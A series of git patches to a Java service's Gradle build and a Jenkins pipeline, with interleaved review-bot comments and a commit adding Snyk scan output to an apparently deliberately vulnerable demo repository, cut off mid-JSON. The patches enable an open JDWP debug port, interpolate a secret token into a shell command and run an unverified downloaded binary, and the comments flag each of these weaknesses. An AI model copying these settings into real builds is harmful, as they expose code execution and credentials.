From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 11:06:57 -0400 Subject: [PATCH 16/38] Update build.gradle --- build.gradle | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/build.gradle b/build.gradle index 2b67bd55b3..442e29675e 100644 --- a/build.gradle +++ b/build.gradle @@ -53,8 +53,7 @@ java { languageVersion = JavaLanguageVersion.of(17) } } -ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() -ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") + jacoco { toolVersion = "0.8.8" } From 25137c8f6c060dced199cb8f46cf5cbfd94f0da0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Mon, 19 Aug 2024 13:20:20 -0400 Subject: [PATCH 17/38] Update build.gradle --- build.gradle | 3 --- 1 file changed, 3 deletions(-) diff --git a/build.gradle b/build.gradle index 442e29675e..ca089e8a44 100644 --- a/build.gradle +++ b/build.gradle @@ -25,9 +25,6 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' - applicationDefaultJvmArgs = [ - '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006' - ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } repositories { From 8a935e73bd3ab718d464d185f2241a8af0df8b6f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Wed, 21 Aug 2024 13:55:45 -0400 Subject: [PATCH 18/38] Update build.gradle --- build.gradle | 158 +++++++++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 153 insertions(+), 5 deletions(-) diff --git a/build.gradle b/build.gradle index ca089e8a44..9b8da9a2b8 100644 --- a/build.gradle +++ b/build.gradle @@ -2,6 +2,7 @@ buildscript { ext { projectName = 'hyrax' projectVersion = version + buildNumber = System.env.BUILD_NUMBER ?: "1" arch = 'noarch' awaitilityVersion = '4.1.0' commonsCollection4Version = '4.4' 
@@ -25,6 +26,11 @@ buildscript { junitVersion = '5.10.1' testContainerVersion = '1.19.3' nexus = 'https://nexus.i.xmatters.com/repository/maven-public/' + nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : "" + nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? project.getProperty("nexusPublishPassword") : "" + applicationDefaultJvmArgs = [ + "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006" + ] dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim() } repositories { @@ -50,7 +56,8 @@ java { languageVersion = JavaLanguageVersion.of(17) } } - +ext.githash = 'git rev-parse --short HEAD'.execute().text.trim() +ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-") jacoco { toolVersion = "0.8.8" } @@ -59,7 +66,10 @@ repositories { mavenCentral() maven { url "${nexus}" } } - +checkstyle { + configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml") + toolVersion = "5.9" +} configurations.configureEach { resolutionStrategy.cacheChangingModulesFor 0, 'seconds' exclude module: "spring-boot-starter-tomcat" 
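Review bot: The restored `applicationDefaultJvmArgs` entry enables a JDWP listener (`server=y,suspend=n,address=5006`) — an unauthenticated debug port that hands arbitrary code execution to anything that can connect — and nothing in the visible file consumes this ext value, so it is either dead configuration or a latent way to ship a debug agent inside a packaged JVM. On the JDK 17 toolchain used here a bare port binds loopback only, but older JDKs bind all interfaces; spell it out as `'-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=localhost:5006'` and gate it behind a dev-only project property rather than a default. The same hunk puts `nexusPublishUsername`/`nexusPublishPassword` into `buildscript.ext`, where every plugin and script on the build classpath can read them, while no `publishing {}` block in this file uses them — read them inside the publish task instead, or drop them. The enclosing `buildscript {}` block starts before this hunk.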
@@ -73,11 +83,25 @@ dependencies { implementation "org.springframework.boot:spring-boot-starter-jetty" implementation("org.springframework.boot:spring-boot-starter-webflux") implementation("org.springframework.boot:spring-boot-starter-oauth2-client") + // tag::actuator[] implementation "org.springframework.boot:spring-boot-starter-actuator" + // end::actuator[] implementation "org.springframework.boot:spring-boot-starter-security" implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1' + constraints { + implementation("org.yaml:snakeyaml:${snakeYamlVersion}") { + because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857" + } + implementation("ch.qos.logback:logback-core:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + implementation("ch.qos.logback:logback-classic:1.2.13") { + because "Upgraded to 1.2.13 because of CVE-2023-6378" + } + } implementation("org.springframework.boot:spring-boot-starter-cache") implementation "org.springframework.boot:spring-boot-starter-cache" + // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this implementation "org.springframework:spring-tx" implementation "org.codehaus.janino:janino" implementation("com.xmatters:springbok:${springbokVersion}") { 
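Review bot: The new `constraints` block pins `ch.qos.logback:logback-core` and `logback-classic` to `1.2.13` and `org.yaml:snakeyaml` to `${snakeYamlVersion}`, but this build resolves unversioned `spring-boot-starter-*` coordinates, i.e. Spring Boot's dependency management is active, and the Boot 3.2 line declared in the buildscript ext (outside this hunk) already manages newer logback 1.4.x and snakeyaml 2.x versions. A Gradle constraint only raises the version floor and conflict resolution keeps the highest requested version, so these entries are very likely no-ops, while the `because` strings read as if they were the fix for CVE-2023-6378 and CVE-2022-25857. Confirm with `gradle dependencyInsight --dependency logback-core` and either drop the block or reword the reasons, e.g. `because "Floor only; Boot-managed version is newer (CVE-2023-6378)"`, so the next reader does not mistake a floor for a pin. The `// tag::actuator[]` / `// end::actuator[]` markers look like documentation-include anchors; if no doc build consumes them they are noise.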
@@ -97,15 +121,19 @@ dependencies { implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}" implementation 'redis.clients:jedis:5.1.2' implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}" + // Websocket/STOMP implementation "org.springframework.boot:spring-boot-starter-websocket" implementation 'org.springframework:spring-messaging' + // Consul client library, may be used for service registration and Key/Value API implementation('com.ecwid.consul:consul-api:1.4.2') { exclude group: 'com.google.code.gson', module: 'gson' } implementation 'javax.xml.bind:jaxb-api:2.3.1' implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1' + // SMTP for email bounce back implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}" implementation 'com.sun.activation:javax.activation:1.2.0' + // https://cloud.google.com/java/docs/bom implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}") implementation 'com.google.code.gson:gson' implementation 'com.google.guava:guava' @@ -117,7 +145,7 @@ dependencies { testImplementation "org.mockito:mockito-inline:${mockitoVersion}" testImplementation "org.awaitility:awaitility:${awaitilityVersion}" testImplementation "com.github.codemonstur:embedded-redis:1.0.0" - + // Needed for the HyraxAuthApiTestController and its associated configuration. testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1') testImplementation(platform('org.junit:junit-bom:5.10.2')) testImplementation('org.junit.jupiter:junit-jupiter') 
@@ -132,5 +160,125 @@ dependencies { "org.testcontainers:testcontainers:${testContainerVersion}", ) } - - +sonarqube { + properties { + property "sonar.projectVersion", version.split('-')[0] + property "sonar.language", "java" + property "sonar.scm.disabled", "true" + property "sonar.core.coveragePlugin", "Jacoco" + } +} +test { + // Checkstyle after test run + finalizedBy = [jacocoTestReport, check] + systemProperties = ["spring.profiles.active": "test, test-overrides"] + useJUnitPlatform() + testLogging { + exceptionFormat = 'full' + events "passed", "skipped", "failed", "standardOut", "standardError" + } +} +tasks.withType(JavaCompile).configureEach { + options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror' +} +bootRun { + gradle.taskGraph.whenReady { taskGraph -> + if (taskGraph.hasTask(bootRun)) { + def error = ''' +Standalone DEV is no longer supported. Please use dev in the cloud for local development. +To discourage further use of this function, you will be presented with a bad dad joke each time you run it! + +''' + try { + def response = 'curl https://icanhazdadjoke.com/'.execute().text + error += '*' * response.length() + error += '\n' + response + '\n' + error += '*' * response.length() + } catch (e) { + error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base' + } + throw new GradleException(error) + } + } +} +// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name, +// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains +// remotes/origin or origin/, since we don't care about that. 
+def sanitize = { input -> + return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", ""); +} +def buildNumber = System.env.BUILD_NUMBER ?: "1" +def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim() +def githash = 'git rev-parse --short HEAD'.execute().text.trim() +def gitbranchTag = sanitize(gcpGitbranch) +def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}" +def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" +def dockerTag = "${dockerRepo}:${dockerTagShort}" +def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL" +//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto +// other upstream callers that are unable to figure out this information on their own. +tasks.register('versionProp') { + onlyIf { true } + doLast { + new File("$project.buildDir/gcpBuildVersion.properties").text = """ +APPLICATION="hyrax" +VERSION=${project.version} +BUILD=${buildNumber} +BRANCH=${gcpGitbranch} +GIT_HASH=${githash} +TAG_FULL=${dockerTag} +TAG=${dockerTagShort} +TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')} +BUILD_TYPE=${buildType} +""" + } +} +generateGitProperties.finalizedBy versionProp +jib { + from { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy" + } + to { + image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax" + tags = ['latest', dockerTagShort] + } + container { + entrypoint = ["/entrypoint.sh"] + mainClass = "com.xmatters.cloudagent.Application" + ports = ['8083'] + containerizingMode = 'exploded' + environment = [ + SERVICE : "hyrax", + OTEL_JAVAAGENT_LOGGING: "application", + OTEL_JAVAAGENT_DEBUG : "false", + OTEL_METRICS_EXPORTER : "none", + JVM_MEMORY : "-XX:MaxRAMPercentage=50", + JVM_PARAMS : "-XshowSettings:vm 
-Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M", + JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2", + JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000", + HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user", + THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out", + LOG_HOME : "/var/log/xmatters/hyrax", + INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString() + ] + labels = [ + maintainer: "mustafar@xmatters.com", + app : "hyrax", + owner : "Mustafar", + version : "${version}", + role : "api" + ] + extraDirectories { + paths { + path { + from = file('docker/files') + into = '/' + includes = ['entrypoint.sh'] + } + } + permissions = [ + '/entrypoint.sh': '755' + ] + } + } +} From 379b0593215992d41213c63b5063b28713b14c61 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 11:53:19 -0500 Subject: [PATCH 19/38] add jenkinsfile Dont want to lose this lol --- .vscode/settings.json | 3 +++ Jenkinsfile | 58 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 .vscode/settings.json create mode 100644 Jenkinsfile diff --git a/.vscode/settings.json b/.vscode/settings.json new file mode 100644 index 0000000000..51d0b5e836 --- /dev/null +++ b/.vscode/settings.json @@ -0,0 +1,3 @@ +{ + "snyk.allIssuesVsNetNewIssues": "All issues" +} \ No newline at end of file diff --git a/Jenkinsfile b/Jenkinsfile new file mode 100644 index 0000000000..8228dda0fe --- /dev/null +++ b/Jenkinsfile 
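Review bot: In the `@@ -132,5 +160,125 @@` hunk, `jib.from.image` pins the base image by a mutable tag (`...ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy`) and `jib.to.tags` always includes `latest`, so a retagged base silently changes what ships without any change here and every branch build overwrites `latest`; pin the base by digest (`image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes@sha256:<digest-placeholder>"`) and add `latest` only for the release branch. `JVM_SSL` limits the client to TLS 1.2 alone via `-Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2`; Java 17 negotiates TLS 1.3 by default, so unless a specific peer is known to break on 1.3, `TLSv1.3,TLSv1.2` keeps the stronger protocol available. The `bootRun` guard fetches `https://icanhazdadjoke.com/` with `curl ... .execute().text`, an outbound call to a third party from the build script; a failed download does not throw (`.text` is simply empty), so the `catch` only covers a missing `curl` binary, and a static message would remove the network dependency entirely. The `versionProp` task writes the raw `gcpGitbranch` into `gcpBuildVersion.properties` while only the sanitized form is used for the tag, and `"$project.buildDir"` is deprecated in Gradle 8 in favour of `layout.buildDirectory`; `onlyIf { true }` is a no-op and can go.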
@@ -0,0 +1,58 @@ +pipeline { + agent any + + stages { + stage('Checkout') { + steps { + git branch: 'main', url: 'https://github.com/dollav/java-goof.git' + } + } + + stage('Build') { + steps { + sh 'mvn clean install -DskipTests' // Skip tests for a faster build, remove -DskipTests to run tests. + } + } + + stage('Download Snyk CLI') { + steps { + sh ''' + curl -Lo ./snyk https://downloads.snyk.io/cli/stable/snyk-linux-arm64 + chmod +x snyk + ls -la + ./snyk -v + ''' + } + } + + + stage('Snyk Scan') { + steps { + script { + withCredentials([string(credentialsId: 'SNYK_TOKEN', variable: 'API_TOKEN')]){ + sh """ + ./snyk auth $API_TOKEN + ./snyk test --all-projects + """ + } + } + } + } + + + stage('Publish') { + steps { + // Example: Publish to a Maven repository + // You'll need to configure your Maven settings and credentials + // sh 'mvn deploy' + echo 'Publish stage - configure as needed' + } + } + + } + post { + always { + cleanWs() // Clean the workspace after each build + } + } +} \ No newline at end of file From 1ff4106fcfcf6644f8a7e7148ea41c58118107ef Mon Sep 17 00:00:00 2001 
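Review bot: In the `Snyk Scan` stage the `sh """ ... ./snyk auth $API_TOKEN ... """` block is a Groovy GString, so the secret bound by `withCredentials` is interpolated into the command text on the controller before the shell runs; Jenkins warns about exactly this pattern because the value can surface in the pipeline log and in process listings. Use a literal string and let the shell expand the environment variable, i.e. change the delimiters to `sh '''` and `'''` and leave `./snyk auth $API_TOKEN` as is. The `Download Snyk CLI` stage fetches `https://downloads.snyk.io/cli/stable/snyk-linux-arm64` from a moving `stable` channel and runs it after `chmod +x` with no checksum or signature check, so an altered download would execute on the agent with the token available; pin a release version and verify the published SHA-256 before `./snyk -v`. The `Checkout` stage also hard-codes `git branch: 'main', url: 'https://github.com/dollav/java-goof.git'` rather than using the job's SCM configuration, which means a PR build would scan `main` instead of the triggering change.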
From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 4 Mar 2025 11:57:16 -0500 Subject: [PATCH 20/38] test --- .dccache | 1 + .gradle/8.11.1/checksums/checksums.lock | Bin 0 -> 17 bytes .gradle/8.11.1/fileChanges/last-build.bin | Bin 0 -> 1 bytes .gradle/8.11.1/fileHashes/fileHashes.lock | Bin 0 -> 17 bytes .gradle/8.11.1/gc.properties | 0 .gradle/8.8/checksums/checksums.lock | Bin 0 -> 17 bytes .../8.8/dependencies-accessors/gc.properties | 0 .gradle/8.8/fileChanges/last-build.bin | Bin 0 -> 1 bytes .gradle/8.8/fileHashes/fileHashes.bin | Bin 0 -> 18547 bytes .gradle/8.8/fileHashes/fileHashes.lock | Bin 0 -> 17 bytes .gradle/8.8/gc.properties | 0 .../buildOutputCleanup.lock | Bin 0 -> 17 bytes .gradle/buildOutputCleanup/cache.properties | 2 + .gradle/vcs-1/gc.properties | 0 .snyk | 8 + as.json | 0 boutput.json | 507 + build/reports/problems/problems-report.html | 663 + index.html | 1 + log4shell-goof/.dccache | 1 + log4shell-goof/log4shell-client/.dccache | 1 + .../log4shell-client/src/main/java/.dccache | 1 + .../log4shell-client/test-vuln.json | 90 + .../test-vuln.json--fail-on=high | 18 + .../test-vuln.json--fail-on=patchable | 90 + .../test-vuln.json--fail-on=upgradable | 90 + log4shell-goof/log4shell-server/.dccache | 1 + log4shell-goof/test/snyk.html | 1600 + output.json | 65575 ++++++++++++++++ output.txt | 15 + output2.json | 12 + script.sh | 85 + snyk.html | 828 + snyk.yaml | 5 + test-command.json | 1421 + test.json | 511 + test.sh | 85 + test2.json | 108 + todolist-goof/.dccache | 1 + todolist-goof/output.json | 47 + todolist-goof/todolist-core/.dccache | 1 + todolist-goof/todolist-web-struts/.snyk | 7 + todolist-goof/todolist-web-struts/json.json | 37955 +++++++++ todolist-goof/todolist-web-struts/snyk.yaml | 5 + todolist-goof/todolist-web-struts/test.json | 2 + todolist-goof/todolist-web-struts/test.sarif | 7412 ++ todolist-goof/todolist-web-struts/test.text | 799 + 47 files changed, 117948 insertions(+) create mode 100644 .dccache 
create mode 100644 .gradle/8.11.1/checksums/checksums.lock create mode 100644 .gradle/8.11.1/fileChanges/last-build.bin create mode 100644 .gradle/8.11.1/fileHashes/fileHashes.lock create mode 100644 .gradle/8.11.1/gc.properties create mode 100644 .gradle/8.8/checksums/checksums.lock create mode 100644 .gradle/8.8/dependencies-accessors/gc.properties create mode 100644 .gradle/8.8/fileChanges/last-build.bin create mode 100644 .gradle/8.8/fileHashes/fileHashes.bin create mode 100644 .gradle/8.8/fileHashes/fileHashes.lock create mode 100644 .gradle/8.8/gc.properties create mode 100644 .gradle/buildOutputCleanup/buildOutputCleanup.lock create mode 100644 .gradle/buildOutputCleanup/cache.properties create mode 100644 .gradle/vcs-1/gc.properties create mode 100644 .snyk create mode 100644 as.json create mode 100644 boutput.json create mode 100644 build/reports/problems/problems-report.html create mode 100644 index.html create mode 100644 log4shell-goof/.dccache create mode 100644 log4shell-goof/log4shell-client/.dccache create mode 100644 log4shell-goof/log4shell-client/src/main/java/.dccache create mode 100644 log4shell-goof/log4shell-client/test-vuln.json create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=high create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=patchable create mode 100644 log4shell-goof/log4shell-client/test-vuln.json--fail-on=upgradable create mode 100644 log4shell-goof/log4shell-server/.dccache create mode 100644 log4shell-goof/test/snyk.html create mode 100644 output.json create mode 100644 output.txt create mode 100644 output2.json create mode 100755 script.sh create mode 100644 snyk.html create mode 100644 snyk.yaml create mode 100644 test-command.json create mode 100644 test.json create mode 100755 test.sh create mode 100644 test2.json create mode 100644 todolist-goof/.dccache create mode 100644 todolist-goof/output.json create mode 100644 todolist-goof/todolist-core/.dccache create mode 100644 
todolist-goof/todolist-web-struts/.snyk create mode 100644 todolist-goof/todolist-web-struts/json.json create mode 100644 todolist-goof/todolist-web-struts/snyk.yaml create mode 100644 todolist-goof/todolist-web-struts/test.json create mode 100644 todolist-goof/todolist-web-struts/test.sarif create mode 100644 todolist-goof/todolist-web-struts/test.text diff --git a/.dccache b/.dccache new file mode 100644 index 0000000000..2dfbd1e49a --- /dev/null +++ b/.dccache 
@@ -0,0 +1 @@ +{"/Users/austindoll/Documents/GitHub/java-goof/.snyk":[263,1709233923336.8115,"4d5ddb18a63b61551137b8f6c2a53c131b013c740e9811f6aa33f3915dd4cbd6"],"/Users/austindoll/Documents/GitHub/java-goof/index.html":[664,1709234730093.0112,"b4b1fd34388ac1f26eb24ebcaff6dbb1a68bf5fe408c038644f2f675380b9f3d"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1707749068003.2305,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/snyk.html":[46685,1708959251167.5747,"430bcf566f778c2cdfa1c3f36a8b0e14e6e65c43caacf812db410839fe091ff4"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/User
s/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb
19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3df
ea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9
a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"